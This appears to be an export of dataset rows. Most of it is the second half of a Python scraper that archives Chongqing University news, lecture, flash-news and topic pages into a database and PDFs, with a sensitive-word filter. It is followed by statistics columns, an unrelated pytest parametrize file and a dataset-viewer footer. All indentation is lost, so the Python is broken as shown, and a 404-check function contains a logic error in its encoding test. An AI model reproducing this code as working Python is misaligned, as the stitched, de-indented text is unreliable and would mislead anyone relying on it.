for each_url, title in zip(links_list, title_list):
print('正在爬取 {} 栏目下,第 {} 页 总第 {} 条讲座。'.format(news_heading, page, sum_i + 1))
# 存储每一个学术预告链接URL的记录,放进字典和数据库,如果已经存在,则不存储
judge = each_url in dict_data.keys()
try:
if not judge:
dict_data[each_url] = title
r = requests.get(each_url, headers=headers)
r.encoding = 'UTF-8'
raw_html = r.text
html = etree.HTML(raw_html)
html_filter = sensitive_word_filter(raw_html)
html_filter = path_rewrite(html_filter)
timestamp = round(time.time())
html_file = new_dir + '/' + str(timestamp) + '.html'
pdf_file = new_dir + '/' + str(timestamp) + '.pdf'
dict_academic['所属栏目'] = news_heading
# 从数据库获取xpath, 并根据xpath获取内容
try:
cur.execute("SELECT name from t_spider_config_xpath where name like %s", news_heading + '%')
xpath_name = cur.fetchall()
for each in xpath_name:
# [4:-5]表示去掉开头‘学术预告’四个字符和结尾‘xpath’五个字符
dict_academic[each[0][4:-5]] = get_xpath_content(html, each[0])
except IndexError:
print("xpath配置错误!")
except etree.XPathEvalError:
print("数据库里未找到记录!")
dict_academic['标题'] = title
dict_academic['网址'] = each_url
time_now = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
dict_academic['采集时间'] = time_now
dict_academic['采集人'] = '档案馆'
json_dict = json.dumps(dict_academic, ensure_ascii=False, indent=4)
print(json_dict)
judge_identifier = not_found_judge(raw_html)
# 判断网页是不是404 not found
if judge_identifier:
cur.execute(insert_result, (conf_id, 'detail', each_url, html_filter, html_file, pdf_file,
time_now, news_heading, None, json_dict))
conn.commit()
json_data = json.dumps(dict_data)
f_data.seek(0, 0)
f_data.write(json_data)
sum_i += 1
with open(html_file, 'w+', encoding='UTF-8') as f1:
f1.write(html_filter)
# html转pdf
pdfkit.from_url(each_url, pdf_file, configuration=confg, options=options)
print('该讲座预告《{}》pdf格式已转换成功。'.format(title))
time.sleep(sleep_time)
else:
# 将404 not found 记录进数据库
html_filter = '404 not found'
cur.execute(insert_result, (conf_id, 'detail', each_url, html_filter, '', '',
time_now, news_heading, None, json_dict))
conn.commit()
json_data = json.dumps(dict_data)
f_data.seek(0, 0)
f_data.write(json_data)
print('该讲座预告《{}》网页不存在, 以‘404 not found’为网页内容存入数据库。'.format(title))
sum_i += 1
else:
sum_i += 1
print('{} 栏目 的 第 {} 条讲座预告 已爬取过且保存在数据库中!'.format(news_heading, sum_i))
except IOError:
print("Warning: wkhtmltopdf读取文件失败, 可能是网页无法打开或者图片/css样式丢失。")
except IndexError:
print("该栏目《{}》下的讲座预告已全部爬取完!".format(news_heading))
break
print('第{}页已经爬取完'.format(page))
page += 1
print('{} 栏目下 共有{}页 {}条讲座预告'.format(news_heading, page - 1, sum_i))
# 读取快讯每个页面的url,获取快讯的每条新闻的归档元数据,并将页面转成pdf格式保存
def get_express_info(url_list, f_data):
global dict_data
# 读取字典中的数据
f_data.seek(0, 0)
content = f_data.read()
if content:
dict_data = json.loads(content)
# 快讯新闻数累加器
sum_i = 0
# 快讯新闻页数计数器
page = 1
# 快讯发布时间处理计数器
i = 0
news_heading = '快讯'
# 获取配置表的id,赋值给结果表
conf_id = get_conf_id(news_heading)
dict_express = dict()
dict_express = {'网站名称': spider_name, '网站域名': spider_url}
# 创建文件夹
# 先判断文件夹是否存在,不存在则创建文件夹
now_dir = os.getcwd()
new_dir = now_dir + '/' + news_heading
dir_judge = os.path.exists(new_dir)
if not dir_judge:
os.mkdir(new_dir)
for url in url_list:
# 存储每一个快讯链接URL的记录,放进数据库,如果已经存在,则不存储
judge = url in dict_data.keys()
try:
if not judge:
# 存储快讯链接及页数名
express_title = '快讯第' + str(page) + '页'
dict_data[url] = express_title
json_data = json.dumps(dict_data)
f_data.seek(0, 0)
f_data.write(json_data)
r = requests.get(url, headers=headers)
r.encoding = 'UTF-8'
raw_html = r.text
html = etree.HTML(raw_html)
html_filter = sensitive_word_filter(raw_html)
timestamp = round(time.time())
html_file = new_dir + '/' + str(timestamp) + '.html'
pdf_file = new_dir + '/' + str(timestamp) + '.pdf'
# 解析快讯发布时间,标题,内容
release_time_list, title_list, content_list = [], [], []
try:
cur.execute("SELECT name from t_spider_config_xpath where name like %s", '快讯' + '%')
xpath_name = cur.fetchall()
for each in xpath_name:
# [2:-5]表示去掉开头‘快讯’两个字符和结尾‘xpath’五个字符
dict_key = each[0][2:-5]
if dict_key == '标题':
title_list = get_xpath_content(html, each[0])
if dict_key == '发布时间':
release_time_list = get_xpath_content(html, each[0])
if dict_key == '具体内容':
content_list = get_xpath_content(html, each[0])
if dict_key != '类栏目标题':
dict_express[dict_key] = ''
except IndexError:
print("xpath配置错误!")
except etree.XPathEvalError:
print("数据库里未找到记录!")
# 格式化发布时间
temp_list = []
for each in release_time_list:
each = each.strip()
# print(each)
temp_list.append(each)
release_time_list = []
while i < len(temp_list)-1:
release_time = temp_list[i] + '月' + temp_list[i+1] + '日'
release_time_list.append(release_time)
i += 2
# 将计数器清零
i = 0
# 格式化快讯内容
temp_list = []
for each in content_list:
each = each.strip()
temp_list.append(each)
content_list = temp_list
for release_time, title, content in zip(release_time_list, title_list, content_list):
print('正在爬取 {} 栏目下,第 {} 页 总第 {} 条快讯。'.format(news_heading, page, sum_i + 1))
print('发布时间:{}, 快讯标题:{}, 快讯内容:{}'.format(release_time, title, content))
# 更新字典,并转成json格式
dict_express['所属栏目'] = news_heading
dict_express['标题'] = title
dict_express['发布时间'] = release_time
dict_express['具体内容'] = content
time_now = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
dict_express['采集时间'] = time_now
dict_express['采集人'] = '档案馆'
json_dict = json.dumps(dict_express, ensure_ascii=False, indent=4)
print(json_dict)
cur.execute(insert_result, (conf_id, 'detail', url, html_filter, html_file, pdf_file,
time_now, news_heading, None, json_dict))
conn.commit()
sum_i += 1
with open(html_file, 'w+', encoding='UTF-8') as f1:
f1.write(html_filter)
# html转pdf
pdfkit.from_string(html_filter, pdf_file, configuration=confg, options=options)
print('快讯第 {} 页pdf格式已转换成功。'.format(page))
time.sleep(sleep_time)
else:
print('{} 栏目 第{}页快讯 已爬取过且保存在数据库中!'.format(news_heading, page))
sum_i += 20
except IOError:
print("Warning: wkhtmltopdf读取文件失败, 可能是网页无法打开或者图片/css样式丢失。")
except IndexError:
print("该栏目《{}》下的新闻已全部爬取完!".format(news_heading))
break
print('第{}页已经爬取完'.format(page))
page += 1
print('{} 栏目下 共有{}页 {}条快讯'.format(news_heading, page - 1, sum_i))
# 获取专题的各个详细页面html,并转成pdf格式保存
def get_topic_info(url_dict, f_data):
global dict_data
# 读取字典中的数据
f_data.seek(0, 0)
content = f_data.read()
if content:
dict_data = json.loads(content)
# 专题数累加器
sum_i = 0
news_heading = '专题'
# 获取配置表的id,赋值给结果表
conf_id = get_conf_id(news_heading)
dict_topic = dict()
dict_topic = {'网站名称': spider_name, '网站域名': spider_url}
# 创建文件夹
# 先判断文件夹是否存在,不存在则创建文件夹
now_dir = os.getcwd()
new_dir = now_dir + '/' + news_heading
dir_judge = os.path.exists(new_dir)
if not dir_judge:
os.mkdir(new_dir)
# key: 专题标题, value:专题链接
for key, value in url_dict.items():
print('正在爬取 {} 栏目下,第 {} 个专题。'.format(news_heading, sum_i + 1))
# 存储每一个专题链接URL的记录,放进字典和数据库,如果已经存在,则不存储
judge = value in dict_data.keys()
try:
if not judge:
dict_data[value] = key
res = requests.get(value, headers=headers)
res.encoding = 'UTF-8'
raw_html = res.text
# 判断网页是不是‘404 not found’
judge_identifier = not_found_judge(raw_html)
if judge_identifier:
html_filter = sensitive_word_filter(raw_html)
timestamp = round(time.time())
html_file = new_dir + '/' + str(timestamp) + '.html'
pdf_file = new_dir + '/' + str(timestamp) + '.pdf'
# 更新字典,并转成json格式
dict_topic['所属栏目'] = news_heading
dict_topic['标题'] = key
dict_topic['网址'] = value
time_now = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
dict_topic['采集时间'] = time_now
json_dict = json.dumps(dict_topic, ensure_ascii=False, indent=4)
print(json_dict)
cur.execute(insert_result, (conf_id, 'detail', value, html_filter, html_file, pdf_file,
time_now, news_heading, None, json_dict))
json_data = json.dumps(dict_data)
f_data.seek(0, 0)
f_data.write(json_data)
conn.commit()
with open(html_file, 'w+', encoding='UTF-8') as f1:
f1.write(html_filter)
# html转pdf
pdfkit.from_url(value, pdf_file, configuration=confg, options=options)
print('该专题《{}》pdf格式已转换成功。'.format(key))
time.sleep(sleep_time)
else:
# 将404 not found 记录进数据库
html_filter = '404 not found'
time_now = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
cur.execute(insert_result,
(conf_id, 'detail', value, html_filter, '', '', time_now, news_heading, None, ''))
conn.commit()
json_data = json.dumps(dict_data)
f_data.seek(0, 0)
f_data.write(json_data)
print('该专题《{}》网页不存在, 以‘404 not found’为网页内容存入数据库。'.format(key))
else:
print('{} 栏目 {} 专题已爬取过且保存在数据库中!'.format(news_heading, key))
except IOError:
print("Warning: wkhtmltopdf读取文件失败, 可能是网页无法打开或者图片/css样式丢失。")
except IndexError:
print("该栏目《{}》下的新闻已全部爬取完!".format(news_heading))
break
sum_i += 1
print('{} 栏目下 共有{}条专题'.format(news_heading, sum_i))
# 判断网页是否是404_not_found, 并返回一个判断标识, 0为空网页,1为正常网页
def not_found_judge(html, r=None):
judge_identifier = 1
# temp/temp_2,3,4 找到'404 not found'/'页面不存在'返回下标,找不到为-1
# 如果网页编码为gb2312,则对网页重新编码解析
if r:
encode_judge = html.find('gb2312')
if encode_judge:
r.encoding = 'gb2312'
html = r.text
temp = html.find('404 Not Found')
temp_2 = html.find('页面不存在')
temp_3 = html.find('页面未找到')
temp_4 = html.find('Page Not Found')
temp_5 = html.find('<div class="content guery" style="display:inline-block;display:-moz-inline-stack;zoom:1;*display:inline; max-width:280px">')
if temp != -1 or temp_2 != -1 or temp_3 != -1 or temp_4 != -1 or temp_5 != -1:
judge_identifier = 0
print('该网页目前无法访问!')
return judge_identifier
# 敏感词过滤
def sensitive_word_filter(content):
ah = Ac_auto.ac_automation()
path = 'sensitive_words.txt'
ah.parse(path)
content = ah.words_replace(content)
# text1 = "新疆骚乱苹果新品发布会"
# text2 = ah.words_replace(text1)
# print(text1)
# print(text2)
return content
# 网页图片相对路径转绝对路径
# 读入一个html原码,修正图片路径后return一个新的html代码
def path_rewrite(html):
new_html = re.sub('="/uploadfile/', '="http://news.cqu.edu.cn/uploadfile/', html)
return new_html
def main():
"""
获取所有的栏目链接
all_news_urls[0-4]: 爬取的第一大类:新闻模块(包括综合新闻、教学科研、招生就业、交流合作、校园生活栏目)
all_news_urls[5]:爬取的第二大类:媒体重大
all_news_urls[6]:爬取的第三大类:通知公告简报
all_news_urls[7]:爬取的第四大类:学术预告
all_news_urls[8]:爬取的第五大类:快讯
all_news_urls[9]:爬取的第六大类:专题
"""
with open('dict_data.txt', 'r+') as f_data:
all_news_urls = all_urls_list(f_data)
# 获取每个栏目下每页的链接
# 爬取的第一大类:新闻模块(包括综合新闻、教学科研、招生就业、交流合作、校园生活栏目)
for url in all_news_urls[:5]:
url_list = get_url_list(url, all_news_urls, f_data)
get_news_info(url_list, url, all_news_urls, f_data)
time.sleep(sleep_time)
# 爬取的第二大类:媒体重大
url = all_news_urls[5]
url_list = get_url_list(url, all_news_urls, f_data)
get_media_info(url_list, f_data)
time.sleep(sleep_time)
# 爬取的第三大类:通知公告简报
url = all_news_urls[6]
url_list = get_url_list(url, all_news_urls, f_data)
get_notice_info(url_list, f_data)
time.sleep(sleep_time)
# 爬取的第四大类:学术预告
url = all_news_urls[7]
url_list = get_url_list(url, all_news_urls, f_data)
get_academic_info(url_list, f_data)
time.sleep(sleep_time)
# 爬取的第五大类:快讯
url = all_news_urls[8]
url_list = get_url_list(url, all_news_urls, f_data)
get_express_info(url_list, f_data)
time.sleep(sleep_time)
# 爬取的第六大类:专题。
url = all_news_urls[9]
url_dict = get_topic_url_list(url, f_data)
get_topic_info(url_dict, f_data)
time.sleep(sleep_time)
print('{} {} 的爬虫任务已完成!'.format(spider_name, spider_url))
cur = conn.cursor()
if __name__ == '__main__':
main()
# 爬虫结束,更新爬虫状态为-1,停止
cur.execute("UPDATE t_spider_task SET status = -1 WHERE id = %s", task_id)
cur.close()
conn.commit()
conn.close()
| 34.940959 | 148 | 0.527638 | 5,361 | 47,345 | 4.4266 | 0.099049 | 0.044035 | 0.022924 | 0.018415 | 0.739118 | 0.719397 | 0.704395 | 0.667692 | 0.661666 | 0.633644 | 0 | 0.013319 | 0.362488 | 47,345 | 1,354 | 149 | 34.966765 | 0.772885 | 0.076587 | 0 | 0.666307 | 0 | 0.0054 | 0.102281 | 0.014093 | 0 | 0 | 0 | 0 | 0 | 1 | 0.017279 | false | 0.00108 | 0.010799 | 0.00108 | 0.037797 | 0.103672 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
8eb56169ef9950001169d01a8eed1270d358937a | 151 | py | Python | pytest-verbose-parametrize/tests/integration/parametrize_ids/tests/unit/test_duplicates.py | RaiVaibhav/pytest-plugins | b21eef7fb2d876b3910f4a476875f9f157275b49 | [
"MIT"
] | 282 | 2015-12-01T12:40:31.000Z | 2019-10-30T23:30:54.000Z | pytest-verbose-parametrize/tests/integration/parametrize_ids/tests/unit/test_duplicates.py | RaiVaibhav/pytest-plugins | b21eef7fb2d876b3910f4a476875f9f157275b49 | [
"MIT"
] | 126 | 2015-09-02T14:31:02.000Z | 2019-10-21T20:32:18.000Z | pytest-verbose-parametrize/tests/integration/parametrize_ids/tests/unit/test_duplicates.py | RaiVaibhav/pytest-plugins | b21eef7fb2d876b3910f4a476875f9f157275b49 | [
"MIT"
] | 55 | 2015-09-21T09:11:05.000Z | 2019-10-27T00:44:32.000Z | import pytest
@pytest.mark.parametrize(('x', 'y', ), [(0, [1]), (0, [1]), (str(0), str([1]))])
def test_foo(x, y):
assert str([int(x) + 1]) == y
| 21.571429 | 80 | 0.496689 | 26 | 151 | 2.846154 | 0.538462 | 0.054054 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.056 | 0.172185 | 151 | 6 | 81 | 25.166667 | 0.536 | 0 | 0 | 0 | 0 | 0 | 0.013245 | 0 | 0 | 0 | 0 | 0 | 0.25 | 1 | 0.25 | false | 0 | 0.25 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.